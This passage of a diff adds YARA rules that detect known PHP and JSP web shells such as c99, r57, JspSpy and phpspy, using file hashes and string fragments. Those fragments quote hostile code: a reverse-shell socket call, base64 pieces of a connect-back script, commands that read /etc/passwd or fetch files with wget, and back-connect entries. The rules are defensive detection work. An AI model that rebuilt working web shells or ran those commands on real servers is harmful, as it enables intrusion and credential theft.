+		hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+	strings:
+		$s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
+	condition:
+		all of them
+}
+rule webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx {
+	meta:
+		description = "Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ef43fef943e9df90ddb6257950b3538f"
+		hash1 = "ae025c886fbe7f9ed159f49593674832"
+		hash2 = "911195a9b7c010f61b66439d9048f400"
+		hash3 = "697dae78c040150daff7db751fc0c03c"
+		hash4 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash8 = "41af6fd253648885c7ad2ed524e0692d"
+		hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
+	strings:
+		$s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
+		$s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
+		$s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
+	condition:
+		all of them
+}
+rule webshell_807_a_css_dm_he1p_JspSpy_xxx {
+	meta:
+		description = "Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash3 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash4 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash5 = "d71716df5042880ef84427acee8b121e"
+		hash6 = "341298482cf90febebb8616426080d1d"
+		hash7 = "29aebe333d6332f0ebc2258def94d57e"
+		hash8 = "42654af68e5d4ea217e6ece5389eb302"
+		hash9 = "88fc87e7c58249a398efd5ceae636073"
+		hash10 = "4a812678308475c64132a9b56254edbc"
+		hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash12 = "344f9073576a066142b2023629539ebd"
+		hash13 = "32dea47d9c13f9000c4c807561341bee"
+		hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash15 = "6acc82544be056580c3a1caaa4999956"
+		hash16 = "6aa32a6392840e161a018f3907a86968"
+		hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash18 = "3ea688e3439a1f56b16694667938316d"
+		hash19 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash20 = "71097537a91fac6b01f46f66ee2d7749"
+		hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var"
+		$s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"
+		$s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"
+	condition:
+		all of them
+}
+rule webshell_201_3_ma_download {
+	meta:
+		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
+		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
+		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
+	condition:
+		all of them
+}
+rule webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download {
+	meta:
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "36331f2c81bad763528d0ae00edf55be"
+		hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash5 = "8979594423b68489024447474d113894"
+		hash6 = "ec482fc969d182e5440521c913bab9bd"
+		hash7 = "f98d2b33cd777e160d1489afed96de39"
+		hash8 = "4b4c12b3002fad88ca6346a873855209"
+		hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash10 = "e9a5280f77537e23da2545306f6a19ad"
+		hash11 = "598eef7544935cf2139d1eada4375bb5"
+		hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
+		$s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
+	condition:
+		all of them
+}
+rule webshell_shell_phpspy_2006_arabicspy {
+	meta:
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
+	strings:
+		$s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
+		$s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
+	condition:
+		all of them
+}
+rule webshell_in_JFolder_jfolder01_jsp_leo_warn {
+	meta:
+		description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash1 = "8979594423b68489024447474d113894"
+		hash2 = "ec482fc969d182e5440521c913bab9bd"
+		hash3 = "f98d2b33cd777e160d1489afed96de39"
+		hash4 = "4b4c12b3002fad88ca6346a873855209"
+		hash5 = "e9a5280f77537e23da2545306f6a19ad"
+	strings:
+		$s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"
+		$s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
+	condition:
+		all of them
+}
+rule webshell_2_520_icesword_job_ma1_ma4_2 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+	strings:
+		$s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
+		$s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"
+		$s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
+	condition:
+		all of them
+}
+rule webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY {
+	meta:
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "0712e3dc262b4e1f98ed25760b206836"
+	strings:
+		$s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
+		$s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
+		$s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
+	condition:
+		2 of them
+}
+rule webshell_shell_phpspy_2006_arabicspy_hkrkoz {
+	meta:
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
+		hash3 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+	condition:
+		all of them
+}
+rule webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx {
+	meta:
+		description = "Web Shell - from files c99.php, Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "f2fa878de03732fbf5c86d656467ff50"
+		hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash5 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
+	condition:
+		all of them
+}
+rule webshell_2008_2009lite_2009mssql {
+	meta:
+		description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "3f4d454d27ecc0013e783ed921eeecde"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+	strings:
+		$s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"
+		$s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
+	condition:
+		all of them
+}
+rule webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz {
+	meta:
+		description = "Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash2 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "0712e3dc262b4e1f98ed25760b206836"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
+		$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
+	condition:
+		all of them
+}
+rule webshell_807_dm_JspSpyJDK5_m_cofigrue {
+	meta:
+		description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash2 = "341298482cf90febebb8616426080d1d"
+		hash3 = "88fc87e7c58249a398efd5ceae636073"
+		hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+	strings:
+		$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
+		$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
+	condition:
+		1 of them
+}
+rule webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx {
+	meta:
+		description = "Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
+		hash1 = "f8a6d5306fb37414c5c772315a27832f"
+		hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
+	strings:
+		$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
+		$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
+	condition:
+		all of them
+}
+rule webshell_404_data_in_JFolder_jfolder01_xxx {
+	meta:
+		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "4b4c12b3002fad88ca6346a873855209"
+		hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash8 = "e9a5280f77537e23da2545306f6a19ad"
+	strings:
+		$s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
+	condition:
+		all of them
+}
+rule webshell_jsp_reverse_jsp_reverse_jspbd {
+	meta:
+		description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		super_rule = 1
+		hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
+		hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
+		hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
+		score = 50
+	strings:
+		$s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
+		$s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
+		$s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
+	condition:
+		all of them
+}
+rule webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc {
+	meta:
+		description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "36331f2c81bad763528d0ae00edf55be"
+		hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash2 = "8979594423b68489024447474d113894"
+		hash3 = "ec482fc969d182e5440521c913bab9bd"
+		hash4 = "f98d2b33cd777e160d1489afed96de39"
+		hash5 = "4b4c12b3002fad88ca6346a873855209"
+		hash6 = "e9a5280f77537e23da2545306f6a19ad"
+		hash7 = "598eef7544935cf2139d1eada4375bb5"
+	strings:
+		$s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
+		$s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
+		$s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
+		$s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
+	condition:
+		2 of them
+}
+rule webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+	strings:
+		$s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
+		$s6 = "password = (String)session.getAttribute(\"password\");" fullword
+		$s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"
+	condition:
+		2 of them
+}
+rule webshell_shell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
+	meta:
+		description = "Web Shell - from files shell.php, 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 60
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash4 = "40a1f840111996ff7200d18968e42cfe"
+		hash5 = "e0202adff532b28ef1ba206cf95962f2"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
+		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword
+		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
+		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword
+		$fn = "filename: backup"
+	condition:
+		2 of ($s*) and not $fn
+}
+rule webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx {
+	meta:
+		description = "Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
+		hash1 = "ef43fef943e9df90ddb6257950b3538f"
+		hash2 = "ae025c886fbe7f9ed159f49593674832"
+		hash3 = "911195a9b7c010f61b66439d9048f400"
+		hash4 = "697dae78c040150daff7db751fc0c03c"
+		hash5 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash9 = "41af6fd253648885c7ad2ed524e0692d"
+		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
+	strings:
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
+	condition:
+		all of them
+}
+rule webshell_itsec_PHPJackal_itsecteam_shell_jHn {
+	meta:
+		description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "e2830d3286001d1455479849aacbbb38"
+		hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash3 = "40c6ecf77253e805ace85f119fe1cebb"
+	strings:
+		$s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
+		$s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
+		$s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
+	condition:
+		2 of them
+}
+rule webshell_Shell_ci_Biz_was_here_c100_v_xxx {
+	meta:
+		description = "Web Shell - from files Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c99-shadows-mod.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "f2fa878de03732fbf5c86d656467ff50"
+		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+	strings:
+		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
+		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
+		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
+		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
+		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
+	condition:
+		2 of them
+}
+rule webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 {
+	meta:
+		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "f3ca29b7999643507081caab926e2e74"
+		hash2 = "527cf81f9272919bf872007e21c4bdda"
+	strings:
+		$s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
+		$s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
+		$s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
+		$s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
+	condition:
+		2 of them
+}
+rule webshell_c99_c99shell_c99_w4cking_Shell_xxx {
+	meta:
+		description = "Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci] .Biz was here.php, acid.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "9c34adbc8fd8d908cbb341734830f971"
+		hash3 = "f2fa878de03732fbf5c86d656467ff50"
+		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash9 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"
+		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
+		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
+		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
+		$s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
+		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
+	condition:
+		2 of them
+}
+rule webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
+	meta:
+		description = "Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s0 = "$this -> addFile($content, $filename);" fullword
+		$s3 = "function addFile($data, $name, $time = 0) {" fullword
+		$s8 = "function unix2DosTime($unixtime = 0) {" fullword
+		$s9 = "foreach($filelist as $filename){" fullword
+	condition:
+		all of them
+}
+rule webshell_c99_c66_c99_shadows_mod_c99shell {
+	meta:
+		description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
+		$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
+		$s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
+		$s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
+		$s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
+		$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
+	condition:
+		2 of them
+}
+rule webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 {
+	meta:
+		description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash1 = "d71716df5042880ef84427acee8b121e"
+		hash2 = "344f9073576a066142b2023629539ebd"
+		hash3 = "32dea47d9c13f9000c4c807561341bee"
+		hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash5 = "3ea688e3439a1f56b16694667938316d"
+		hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
+	strings:
+		$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
+		$s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?"
+		$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
+		$s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"
+	condition:
+		2 of them
+}
+rule webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash4 = "e0354099bee243702eb11df8d0e046df"
+		hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash6 = "655722eaa6c646437c8ae93daac46ae0"
+		hash7 = "591ca89a25f06cf01e4345f98a22845c"
+	strings:
+		$s0 = "return new Double(format.format(value)).doubleValue();" fullword
+		$s5 = "File tempF = new File(savePath);" fullword
+		$s9 = "if (tempF.isDirectory()) {" fullword
+	condition:
+		2 of them
+}
+rule webshell_c99_c99shell_c99_c99shell {
+	meta:
+		description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
